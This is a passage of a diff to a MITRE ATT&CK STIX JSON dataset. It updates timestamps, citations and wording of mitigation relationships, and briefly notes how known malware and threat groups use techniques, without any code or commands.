in the same environment. Ensure there are regular reviews of accounts provisioned to these systems to verify continued business need, and ensure there is governance to trace de-provisioning of access that is no longer required. Ensure proper system and access isolation for critical network systems through use of account privilege separation.", "id": "relationship--0dfd9bcd-f9e2-44c1-9d87-07c626644561", "type": "relationship", - "modified": "2020-02-21T16:31:33.058Z", + "modified": "2020-09-16T15:27:01.634Z", "created": "2019-07-18T21:33:37.812Z" }, { @@ -149180,7 +154429,7 @@ } ], "type": "relationship", - "modified": "2020-03-27T21:09:28.966Z", + "modified": "2020-10-14T14:52:11.954Z", "created": "2019-07-19T14:35:12.517Z" }, { @@ -150947,27 +156196,6 @@ "modified": "2019-10-14T19:33:55.195Z", "created": "2019-08-29T18:52:20.983Z" }, - { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "source_ref": "malware--f1314e75-ada8-49f4-b281-b1fb8b48f2a7", - "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", - "external_references": [ - { - "description": "Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.", - "url": "https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/", - "source_name": "Carbon Black Shlayer Feb 2019" - } - ], - "description": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) can disable Gatekeeper using the native spctl application.(Citation: Carbon Black Shlayer Feb 2019)", - "relationship_type": "uses", - "id": "relationship--0713e9ce-9c10-4f1e-b5a4-0ab2a50da2d1", - "type": "relationship", - "modified": "2019-09-12T15:09:10.628Z", - "created": "2019-08-29T18:52:20.985Z" - }, { "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ @@ -151347,16 +156575,21 @@ "target_ref": "attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345", "external_references": [ { - "description": "Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.", + "source_name": "Carbon Black Shlayer Feb 2019", "url": "https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/", - "source_name": "Carbon Black Shlayer Feb 2019" + "description": "Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019." + }, + { + "source_name": "Carbon Black Shlayer Feb 2019", + "url": "https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/", + "description": "Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019." } ], - "description": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) can use the chmod utility to set a .app file as executable.(Citation: Carbon Black Shlayer Feb 2019)", + "description": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) can use the chmod utility to set a .app file as executable, and the spctl application to disable Gatekeeper protection for a downloaded file.(Citation: Carbon Black Shlayer Feb 2019).(Citation: Carbon Black Shlayer Feb 2019)", "relationship_type": "uses", "id": "relationship--544cc12a-53c4-4a56-b480-bfc79beee93c", "type": "relationship", - "modified": "2020-03-17T15:11:44.525Z", + "modified": "2020-10-22T18:35:58.511Z", "created": "2019-09-10T14:30:31.699Z" }, { @@ -151495,27 +156728,6 @@ "modified": "2020-03-17T19:40:12.096Z", "created": "2019-09-13T12:51:46.273Z" }, - { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "source_ref": "intrusion-set--38863958-a201-4ce1-9dbe-539b0b6804e0", - "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e", - "external_references": [ - { - "source_name": "Cylance Machete Mar 2017", - "url": "https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html", - "description": "The Cylance Threat Research Team. (2017, March 22). El Machete's Malware Attacks Cut Through LATAM. Retrieved September 13, 2019." - } - ], - "description": "[Machete](https://attack.mitre.org/groups/G0095) used TCP port 21 for C2.(Citation: Cylance Machete Mar 2017)", - "relationship_type": "uses", - "id": "relationship--770ef450-2ecc-4d76-8ecb-0c2dcecd3156", - "type": "relationship", - "modified": "2019-09-13T16:48:01.291Z", - "created": "2019-09-13T12:51:46.276Z" - }, { "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ @@ -152582,13 +157794,18 @@ "description": "Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.", "url": "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/", "source_name": "Security Intelligence More Eggs Aug 2019" + }, + { + "description": "Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.", + "url": "https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf", + "source_name": "Visa FIN6 Feb 2019" } ], - "description": "(Citation: Security Intelligence More Eggs Aug 2019)", + "description": "(Citation: Security Intelligence More Eggs Aug 2019)(Citation: Visa FIN6 Feb 2019)", "relationship_type": "uses", "id": "relationship--5b8c6d74-6fa5-455b-8400-92fdda5c299e", "type": "relationship", - "modified": "2019-09-16T19:42:21.183Z", + "modified": "2020-09-09T15:53:09.924Z", "created": "2019-09-16T19:42:21.183Z" }, { @@ -155580,7 +160797,7 @@ "description": "Ensure that applications do not store sensitive data or credentials insecurely. (e.g. plaintext credentials in code, published credentials in repositories, or credentials in public cloud storage).", "id": "relationship--c8acdf40-8237-487f-8255-91afa327705d", "type": "relationship", - "modified": "2020-06-20T22:44:36.305Z", + "modified": "2020-08-04T14:04:58.486Z", "created": "2019-10-10T18:46:45.553Z" }, { @@ -156244,11 +161461,11 @@ { "source_name": "Mandiant M-Trends 2020", "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." } ], "type": "relationship", - "modified": "2020-06-18T11:45:36.669Z", + "modified": "2020-09-14T19:48:07.199Z", "created": "2019-10-11T17:48:31.883Z" }, { @@ -156701,7 +161918,7 @@ "id": "relationship--3b2b3dfd-4126-4b04-b8a7-381b5cb61dbf", "description": "Patch the BIOS and EFI as necessary.", "type": "relationship", - "modified": "2019-12-19T18:49:30.361Z", + "modified": "2020-10-21T17:48:20.467Z", "created": "2019-11-13T14:44:49.718Z" }, { @@ -156715,7 +161932,7 @@ "id": "relationship--b2651406-190a-4341-8d76-f9c25f66077b", "description": "Ensure proper permissions are in place to help prevent adversary access to privileged accounts necessary to perform these actions", "type": "relationship", - "modified": "2019-12-19T18:49:30.363Z", + "modified": "2020-10-21T17:48:20.483Z", "created": "2019-11-13T14:44:49.721Z" }, { @@ -156741,7 +161958,7 @@ ], "description": "Use Trusted Platform Module technology and a secure or trusted boot process to prevent system integrity from being compromised. Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. (Citation: TCG Trusted Platform Module) (Citation: TechNet Secure Boot Process)", "type": "relationship", - "modified": "2020-04-23T19:10:28.375Z", + "modified": "2020-10-21T17:48:20.485Z", "created": "2019-11-13T14:44:49.724Z" }, { @@ -157256,7 +162473,7 @@ "relationship_type": "mitigates", "id": "relationship--5d7f29b7-4b95-425b-bb2c-7c722d6ec1aa", "type": "relationship", - "modified": "2020-05-07T22:32:05.513Z", + "modified": "2020-09-17T19:47:14.486Z", "created": "2019-12-19T21:05:38.391Z" }, { @@ -157282,7 +162499,7 @@ } ], "type": "relationship", - "modified": "2020-05-07T22:32:05.515Z", + "modified": "2020-09-17T19:47:14.495Z", "created": "2019-12-19T21:05:38.409Z" }, { @@ -157296,7 +162513,7 @@ "description": "Ensure proper permissions are in place to help prevent adversary access to privileged accounts necessary to install a bootkit.", "id": "relationship--99662840-c630-4858-8d44-331d0b31fbc1", "type": "relationship", - "modified": "2020-05-07T22:32:05.506Z", + "modified": "2020-09-17T19:47:14.530Z", "created": "2019-12-19T21:05:38.415Z" }, { @@ -157884,7 +163101,7 @@ "description": "Limit user access to system utilities such as 'systemctl' to only users who have a legitimate need.", "id": "relationship--751d1faf-0685-4a1b-8a72-de34bfd6da7e", "type": "relationship", - "modified": "2020-03-25T22:13:59.706Z", + "modified": "2020-10-09T13:46:29.890Z", "created": "2020-01-17T16:49:36.576Z" }, { @@ -157898,7 +163115,7 @@ "description": "The creation and modification of systemd service unit files is generally reserved for administrators such as the Linux root user and other users with superuser privileges. ", "id": "relationship--b8d33b58-e0d0-4bf8-a8ec-f6c4c2f1a480", "type": "relationship", - "modified": "2020-03-25T22:13:59.713Z", + "modified": "2020-10-09T13:46:29.887Z", "created": "2020-01-17T16:49:36.593Z" }, { @@ -157912,7 +163129,7 @@ "description": "Restrict software installation to trusted repositories only and be cautious of orphaned software packages.", "id": "relationship--ebb9afc6-dbe3-4049-8f33-a782f15eca79", "type": "relationship", - "modified": "2020-03-25T22:13:59.709Z", + "modified": "2020-10-09T13:46:29.888Z", "created": "2020-01-17T16:49:36.594Z" }, { @@ -157926,7 +163143,7 @@ "description": "Restrict read/write access to systemd unit files to only select privileged users who have a legitimate need to manage system services.", "id": "relationship--9d7f9d7b-c246-4849-b65e-1ac45208b427", "type": "relationship", - "modified": "2020-03-25T22:13:59.744Z", + "modified": "2020-10-09T13:46:29.904Z", "created": "2020-01-17T16:49:36.597Z" }, { @@ -157979,7 +163196,7 @@ "description": "Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them. ", "id": "relationship--40f51fdc-cd3c-4e93-9593-e1ee7cf2211e", "type": "relationship", - "modified": "2020-03-25T22:22:10.220Z", + "modified": "2020-09-16T15:49:58.690Z", "created": "2020-01-17T19:19:05.361Z" }, { @@ -157993,7 +163210,7 @@ "description": "Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. ", "id": "relationship--d1667060-2bbe-41df-94eb-ce8b68fb084d", "type": "relationship", - "modified": "2020-03-25T22:22:10.249Z", + "modified": "2020-09-16T15:49:58.697Z", "created": "2020-01-17T19:19:05.372Z" }, { @@ -158007,7 +163224,7 @@ "description": "Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new Launch Daemons.", "id": "relationship--48c4d56e-e282-4810-b974-6a325b7d130d", "type": "relationship", - "modified": "2020-03-25T22:27:49.759Z", + "modified": "2020-09-16T15:46:44.287Z", "created": "2020-01-17T19:23:15.412Z" }, { @@ -158031,10 +163248,10 @@ "source_ref": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f", "target_ref": "attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd", "relationship_type": "mitigates", - "description": "Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.", + "description": "Do not allow domain administrator or root accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.", "id": "relationship--8b4c2543-e2f1-4f7c-b687-d07e7a4c763c", "type": "relationship", - "modified": "2020-07-15T12:43:36.498Z", + "modified": "2020-10-05T16:43:27.188Z", "created": "2020-01-19T16:10:15.496Z" }, { @@ -158048,7 +163265,7 @@ "description": "Configure access controls and firewalls to limit access to critical systems and domain controllers. Most cloud environments support separate virtual private cloud (VPC) instances that enable further segmentation of cloud systems.", "id": "relationship--69f9daff-c253-4d99-94e6-cd2a7a9483dc", "type": "relationship", - "modified": "2020-07-15T12:43:36.501Z", + "modified": "2020-10-05T16:43:27.201Z", "created": "2020-01-19T16:10:15.530Z" }, { @@ -158059,10 +163276,17 @@ "source_ref": "course-of-action--b045d015-6bed-4490-bd38-56b41ece59a0", "target_ref": "attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd", "relationship_type": "mitigates", - "description": "Use multi-factor authentication for user and privileged accounts.", + "description": "Use multi-factor authentication for user and privileged accounts. Consider enforcing multi-factor authentication for the CreateKeyPair and ImportKeyPair API calls through IAM policies.(Citation: Expel IO Evil in AWS)", "id": "relationship--04f19ae7-931f-4798-a609-4b64aced1da3", + "external_references": [ + { + "source_name": "Expel IO Evil in AWS", + "url": "https://expel.io/blog/finding-evil-in-aws/", + "description": "A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020." + } + ], "type": "relationship", - "modified": "2020-07-15T12:43:36.520Z", + "modified": "2020-10-05T16:43:27.220Z", "created": "2020-01-19T16:10:15.541Z" }, { @@ -158452,7 +163676,7 @@ "description": "Restrict storage and execution of Control Panel items to protected directories, such as C:\\Windows, rather than user directories.", "id": "relationship--2db67ddf-b414-4dc7-87ab-0846a8bd1e8e", "type": "relationship", - "modified": "2020-06-20T22:33:19.040Z", + "modified": "2020-10-21T18:37:13.152Z", "created": "2020-01-23T19:59:52.898Z" }, { @@ -158498,7 +163722,7 @@ } ], "type": "relationship", - "modified": "2020-06-20T22:33:19.063Z", + "modified": "2020-10-21T18:37:13.412Z", "created": "2020-01-23T19:59:52.901Z" }, { @@ -160280,7 +165504,7 @@ "description": "Remove users from the local administrator group on systems.", "id": "relationship--922037af-61f0-42d8-8b57-310b6b56ea5a", "type": "relationship", - "modified": "2020-06-25T19:57:54.875Z", + "modified": "2020-07-22T21:36:52.716Z", "created": "2020-01-30T14:24:35.581Z" }, { @@ -160294,7 +165518,7 @@ "description": "Although UAC bypass techniques exist, it is still prudent to use the highest enforcement level for UAC when possible and mitigate bypass opportunities that exist with techniques such as [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).", "id": "relationship--86eb3c0d-b1c1-4b52-b802-18f321450f29", "type": "relationship", - "modified": "2020-06-25T19:57:54.870Z", + "modified": "2020-07-22T21:36:52.692Z", "created": "2020-01-30T14:24:35.595Z" }, { @@ -160315,7 +165539,7 @@ } ], "type": "relationship", - "modified": "2020-06-25T19:57:54.893Z", + "modified": "2020-07-22T21:36:52.740Z", "created": "2020-01-30T14:24:35.600Z" }, { @@ -160618,7 +165842,7 @@ } ], "type": "relationship", - "modified": "2020-03-23T20:24:53.044Z", + "modified": "2020-09-16T19:40:02.187Z", "created": "2020-01-30T17:37:22.721Z" }, { @@ -160632,7 +165856,7 @@ "description": "File encryption should be enforced across email communications containing sensitive information that may be obtained through access to email services.", "id": "relationship--efafd777-c53d-4459-8765-2e5e44cd0ea1", "type": "relationship", - "modified": "2020-03-23T20:24:53.046Z", + "modified": "2020-09-16T19:40:02.197Z", "created": "2020-01-30T17:37:22.734Z" }, { @@ -160646,7 +165870,7 @@ "description": "Administrators can leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.", "id": "relationship--86f6ea64-eb95-4228-956f-eae82b8f49d8", "type": "relationship", - "modified": "2020-03-23T20:24:53.064Z", + "modified": "2020-09-16T19:40:02.220Z", "created": "2020-01-30T17:37:22.737Z" }, { @@ -160673,7 +165897,7 @@ "description": "Configure browsers or tasks to regularly delete persistent cookies.", "id": "relationship--10017b2e-7234-4368-81d7-a4c8b98c26a0", "type": "relationship", - "modified": "2020-03-24T12:36:24.591Z", + "modified": "2020-09-16T19:40:44.654Z", "created": "2020-01-30T17:48:49.736Z" }, { @@ -160749,7 +165973,7 @@ "source_ref": "course-of-action--609191bf-7d06-40e4-b1f8-9e11eb3ff8a6", "target_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", "relationship_type": "mitigates", - "description": "Making the associated environment variables read only can make sure that the history is preserved.(Citation: Securing bash history)", + "description": "Making the environment variables associated with command history read only may ensure that the history is preserved.(Citation: Securing bash history)", "id": "relationship--dcc531dd-6136-44ac-963b-3ebab0028d96", "external_references": [ { @@ -160759,7 +165983,7 @@ } ], "type": "relationship", - "modified": "2020-03-29T21:31:03.171Z", + "modified": "2020-10-16T18:09:48.831Z", "created": "2020-01-31T12:32:08.384Z" }, { @@ -160770,10 +165994,10 @@ "source_ref": "course-of-action--987988f0-cf86-4680-a875-2f6456ab2448", "target_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", "relationship_type": "mitigates", - "description": "Preventing users from deleting or writing to certain files can stop adversaries from maliciously altering their ~/.bash_history files.", + "description": "Preventing users from deleting or writing to certain files can stop adversaries from maliciously altering their ~/.bash_history or ConsoleHost_history.txt files.", "id": "relationship--9e7fc18e-06a3-437f-8e3b-18f5378c9d44", "type": "relationship", - "modified": "2020-03-29T21:31:03.167Z", + "modified": "2020-10-16T18:09:48.883Z", "created": "2020-01-31T12:32:08.411Z" }, { @@ -160787,7 +166011,7 @@ "description": "Preventing users from deleting or writing to certain files can stop adversaries from maliciously altering their ~/.bash_history files.", "id": "relationship--986430e2-0520-4a81-86a7-b7fd7554fcb2", "type": "relationship", - "modified": "2020-03-29T21:31:03.169Z", + "modified": "2020-10-16T18:09:48.942Z", "created": "2020-01-31T12:32:08.422Z" }, { @@ -161384,7 +166608,7 @@ "description": "Preemptively search for files containing passwords or other credentials and take actions to reduce the exposure risk when found.", "id": "relationship--abe43d10-714a-4f29-b164-d7cadd83cb61", "type": "relationship", - "modified": "2020-03-31T12:52:04.853Z", + "modified": "2020-10-12T21:38:13.130Z", "created": "2020-02-04T13:42:40.685Z" }, { @@ -161405,7 +166629,7 @@ } ], "type": "relationship", - "modified": "2020-03-31T12:52:04.871Z", + "modified": "2020-10-12T21:38:13.166Z", "created": "2020-02-04T13:42:40.694Z" }, { @@ -161419,7 +166643,7 @@ "description": "Restrict file shares to specific directories with access only to necessary users.", "id": "relationship--8497e912-185d-403b-865e-17c4b02290d2", "type": "relationship", - "modified": "2020-03-31T12:52:04.908Z", + "modified": "2020-10-12T21:38:13.199Z", "created": "2020-02-04T13:42:40.704Z" }, { @@ -161461,7 +166685,7 @@ "description": "Ensure critical system files as well as those known to be abused by adversaries have restrictive permissions and are owned by an appropriately privileged account, especially if access is not required by users nor will inhibit system functionality.", "id": "relationship--2a7a152f-79c9-45c9-9f09-0d39f563ad05", "type": "relationship", - "modified": "2020-03-29T23:07:56.155Z", + "modified": "2020-09-01T20:05:05.420Z", "created": "2020-02-04T19:17:42.259Z" }, { @@ -161475,7 +166699,7 @@ "description": "Applying more restrictive permissions to files and directories could prevent adversaries from modifying the access control lists.", "id": "relationship--376c4c97-bec7-455d-ac44-88b7cbd8bd43", "type": "relationship", - "modified": "2020-03-29T23:07:56.147Z", + "modified": "2020-09-01T20:05:05.440Z", "created": "2020-02-04T19:17:42.262Z" }, { @@ -163168,7 +168392,7 @@ } ], "type": "relationship", - "modified": "2020-03-25T18:18:20.499Z", + "modified": "2020-10-15T19:39:35.471Z", "created": "2020-02-17T20:44:54.835Z" }, { @@ -163789,7 +169013,7 @@ } ], "type": "relationship", - "modified": "2020-03-29T01:43:29.532Z", + "modified": "2020-09-16T15:54:35.602Z", "created": "2020-02-20T15:27:18.822Z" }, { @@ -163810,7 +169034,7 @@ } ], "type": "relationship", - "modified": "2020-03-29T01:43:29.540Z", + "modified": "2020-09-16T15:54:35.607Z", "created": "2020-02-20T15:27:18.840Z" }, { @@ -163844,7 +169068,7 @@ } ], "type": "relationship", - "modified": "2020-03-29T01:52:54.148Z", + "modified": "2020-09-16T15:56:03.344Z", "created": "2020-02-20T15:31:43.899Z" }, { @@ -163865,7 +169089,7 @@ } ], "type": "relationship", - "modified": "2020-03-29T01:52:54.139Z", + "modified": "2020-09-16T15:56:03.361Z", "created": "2020-02-20T15:31:43.907Z" }, { @@ -163994,7 +169218,7 @@ "description": "Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Too strict a policy may create a denial of service condition and render environments un-usable, with all accounts used in the brute force being locked-out.", "id": "relationship--8f2d973c-aa06-42a1-9490-1e799c0a5ee2", "type": "relationship", - "modified": "2020-03-29T17:11:46.643Z", + "modified": "2020-09-16T15:41:46.709Z", "created": "2020-02-20T16:58:50.657Z" }, { @@ -164008,7 +169232,7 @@ "description": "Use multi-factor authentication. Where possible, also enable multi-factor authentication on externally facing services.", "id": "relationship--7fad18cd-28b4-47b4-8b38-f8beaf1120ad", "type": "relationship", - "modified": "2020-03-29T17:11:46.656Z", + "modified": "2020-09-16T15:41:46.722Z", "created": "2020-02-20T16:58:50.670Z" }, { @@ -164029,7 +169253,7 @@ } ], "type": "relationship", - "modified": "2020-03-29T17:11:46.674Z", + "modified": "2020-09-16T15:41:46.720Z", "created": "2020-02-20T16:58:50.680Z" }, { @@ -164043,7 +169267,7 @@ "description": "Use multi-factor authentication. Where possible, also enable multi-factor authentication on externally facing services.", "id": "relationship--dc1b1842-ce36-46ec-83d5-66292d65c463", "type": "relationship", - "modified": "2020-07-09T17:01:18.218Z", + "modified": "2020-09-16T15:39:59.187Z", "created": "2020-02-20T17:14:40.155Z" }, { @@ -164064,7 +169288,7 @@ } ], "type": "relationship", - "modified": "2020-07-09T17:01:18.187Z", + "modified": "2020-09-16T15:39:59.209Z", "created": "2020-02-20T17:14:40.157Z" }, { @@ -164078,7 +169302,7 @@ "description": "Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Too strict a policy may create a denial of service condition and render environments un-usable, with all accounts used in the brute force being locked-out.", "id": "relationship--cff34686-cbdf-4e0b-8108-c2deaf8855a7", "type": "relationship", - "modified": "2020-03-29T17:13:57.302Z", + "modified": "2020-09-16T15:43:11.688Z", "created": "2020-02-20T17:21:04.878Z" }, { @@ -164092,7 +169316,7 @@ "description": "Use multi-factor authentication. Where possible, also enable multi-factor authentication on externally facing services.", "id": "relationship--64201f56-d678-4ed2-b759-c78bf9e4d82a", "type": "relationship", - "modified": "2020-03-29T17:13:57.315Z", + "modified": "2020-09-16T15:43:11.713Z", "created": "2020-02-20T17:21:04.881Z" }, { @@ -164113,7 +169337,7 @@ } ], "type": "relationship", - "modified": "2020-03-29T17:13:57.345Z", + "modified": "2020-09-16T15:43:11.721Z", "created": "2020-02-20T17:21:04.895Z" }, { @@ -164127,7 +169351,7 @@ "description": "Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Too strict a policy may create a denial of service condition and render environments un-usable, with all accounts used in the brute force being locked-out.", "id": "relationship--4b7e0525-1ba7-4d55-89d1-07fc94193065", "type": "relationship", - "modified": "2020-03-29T20:35:36.820Z", + "modified": "2020-09-16T15:38:40.890Z", "created": "2020-02-20T17:27:40.285Z" }, { @@ -164141,7 +169365,7 @@ "description": "Use multi-factor authentication. Where possible, also enable multi-factor authentication on externally facing services.", "id": "relationship--ce2f8c4d-43f0-459e-a579-1faf28e4bca6", "type": "relationship", - "modified": "2020-03-29T20:35:36.842Z", + "modified": "2020-09-16T15:38:40.900Z", "created": "2020-02-20T17:27:40.299Z" }, { @@ -164162,7 +169386,7 @@ } ], "type": "relationship", - "modified": "2020-03-29T20:35:36.840Z", + "modified": "2020-09-16T15:38:40.915Z", "created": "2020-02-20T17:27:40.301Z" }, { @@ -164410,7 +169634,7 @@ "description": "System scans can be performed to identify unauthorized archival utilities.", "id": "relationship--9e0cc38c-17a0-4320-b9b4-dc8458a9bb79", "type": "relationship", - "modified": "2020-03-25T21:45:40.313Z", + "modified": "2020-10-21T16:36:56.126Z", "created": "2020-02-20T20:53:46.027Z" }, { @@ -164947,41 +170171,6 @@ "modified": "2020-06-20T22:28:08.872Z", "created": "2020-02-21T20:46:51.944Z" }, - { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "source_ref": "course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3", - "target_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", - "relationship_type": "mitigates", - "description": "Make sure that the HISTCONTROL environment variable is set to \u201cignoredups\u201d instead of \u201cignoreboth\u201d or \u201cignorespace\u201d.", - "id": "relationship--35928199-0073-4000-b2f8-726ab2d41a06", - "type": "relationship", - "modified": "2020-06-19T16:50:46.018Z", - "created": "2020-02-21T20:56:06.721Z" - }, - { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "source_ref": "course-of-action--609191bf-7d06-40e4-b1f8-9e11eb3ff8a6", - "target_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", - "relationship_type": "mitigates", - "description": "Prevent users from changing the HISTCONTROL environment variable. (Citation: Securing bash history)", - "id": "relationship--faacf800-b19d-4d6b-956f-44ce729a36d5", - "external_references": [ - { - "url": "http://www.akyl.net/securing-bashhistory-file-make-sure-your-linux-system-users-won%E2%80%99t-hide-or-delete-their-bashhistory", - "description": "Mathew Branwell. (2012, March 21). Securing .bash_history file. Retrieved July 8, 2017.", - "source_name": "Securing bash history" - } - ], - "type": "relationship", - "modified": "2020-03-29T22:09:18.202Z", - "created": "2020-02-21T20:56:06.726Z" - }, { "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ @@ -165785,7 +170974,7 @@ } ], "type": "relationship", - "modified": "2020-02-27T18:25:30.510Z", + "modified": "2020-09-16T19:38:24.290Z", "created": "2020-02-27T18:17:58.877Z" }, { @@ -165806,7 +170995,7 @@ } ], "type": "relationship", - "modified": "2020-02-27T18:25:30.544Z", + "modified": "2020-09-16T19:38:24.306Z", "created": "2020-02-27T18:17:58.910Z" }, { @@ -165827,7 +171016,7 @@ } ], "type": "relationship", - "modified": "2020-02-27T18:25:30.578Z", + "modified": "2020-09-16T19:38:24.304Z", "created": "2020-02-27T18:17:58.916Z" }, { @@ -165840,8 +171029,15 @@ "relationship_type": "mitigates", "description": "Ensure strong password length (ideally 25+ characters) and complexity for service accounts and that these passwords periodically expire.(Citation: AdSecurity Cracking Kerberos Dec 2015) Also consider using Group Managed Service Accounts or another third party product such as password vaulting.(Citation: AdSecurity Cracking Kerberos Dec 2015)", "id": "relationship--cb2238b0-bd8e-4b21-b692-d1f362c102b4", + "external_references": [ + { + "url": "https://adsecurity.org/?p=2293", + "description": "Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast \u2013 Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.", + "source_name": "AdSecurity Cracking Kerberos Dec 2015" + } + ], "type": "relationship", - "modified": "2020-02-28T15:22:27.314Z", + "modified": "2020-09-16T19:37:55.294Z", "created": "2020-02-28T15:22:27.314Z" }, { @@ -165854,8 +171050,15 @@ "relationship_type": "mitigates", "description": "Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible.(Citation: AdSecurity Cracking Kerberos Dec 2015)", "id": "relationship--5574a01e-efcc-49d6-8692-30c97c611397", + "external_references": [ + { + "url": "https://adsecurity.org/?p=2293", + "description": "Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast \u2013 Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.", + "source_name": "AdSecurity Cracking Kerberos Dec 2015" + } + ], "type": "relationship", - "modified": "2020-02-28T15:22:27.331Z", + "modified": "2020-09-16T19:37:55.310Z", "created": "2020-02-28T15:22:27.331Z" }, { @@ -165876,7 +171079,7 @@ } ], "type": "relationship", - "modified": "2020-03-06T13:37:57.389Z", + "modified": "2020-09-16T19:37:55.325Z", "created": "2020-02-28T15:22:27.335Z" }, { @@ -165890,7 +171093,7 @@ "description": "For containing the impact of a previously generated golden ticket, reset the built-in KRBTGT account password twice, which will invalidate any existing golden tickets that have been created with the KRBTGT hash and other Kerberos tickets derived from it.", "id": "relationship--037b851b-7ced-4322-a57a-9f744f9a1e76", "type": "relationship", - "modified": "2020-03-31T13:06:23.737Z", + "modified": "2020-09-16T19:37:55.335Z", "created": "2020-02-28T15:22:27.336Z" }, { @@ -166136,7 +171339,7 @@ "description": "Anti-virus can automatically quarantine suspicious files.", "id": "relationship--ed821f5e-9527-4fbb-ae76-37a79592dfb6", "type": "relationship", - "modified": "2020-03-02T19:06:59.092Z", + "modified": "2020-10-18T01:49:59.560Z", "created": "2020-03-02T18:49:28.109Z" }, { @@ -166150,7 +171353,7 @@ "description": "Network intrusion prevention systems and systems designed to scan and remove malicious email attachments or links can be used to block activity.", "id": "relationship--76588f90-79b8-4a61-ae07-3321393e5707", "type": "relationship", - "modified": "2020-03-02T19:06:59.095Z", + "modified": "2020-10-18T01:49:59.617Z", "created": "2020-03-02T18:49:28.111Z" }, { @@ -166164,7 +171367,7 @@ "description": "Determine if certain websites or attachment types (ex: .scr, .exe, .pif, .cpl, etc.) that can be used for phishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.", "id": "relationship--a205b0ce-df00-40ae-b626-7dc3e8146d45", "type": "relationship", - "modified": "2020-03-02T19:06:59.118Z", + "modified": "2020-10-18T01:49:59.660Z", "created": "2020-03-02T18:49:28.119Z" }, { @@ -166178,7 +171381,7 @@ "description": "Users can be trained to identify social engineering techniques and phishing emails.", "id": "relationship--ee935350-f68f-4bd7-bfca-878ae48a2b97", "type": "relationship", - "modified": "2020-03-02T19:06:59.120Z", + "modified": "2020-10-18T01:49:59.716Z", "created": "2020-03-02T18:49:28.130Z" }, { @@ -166192,7 +171395,7 @@ "description": "Users can be trained to identify social engineering techniques and spearphishing emails.", "id": 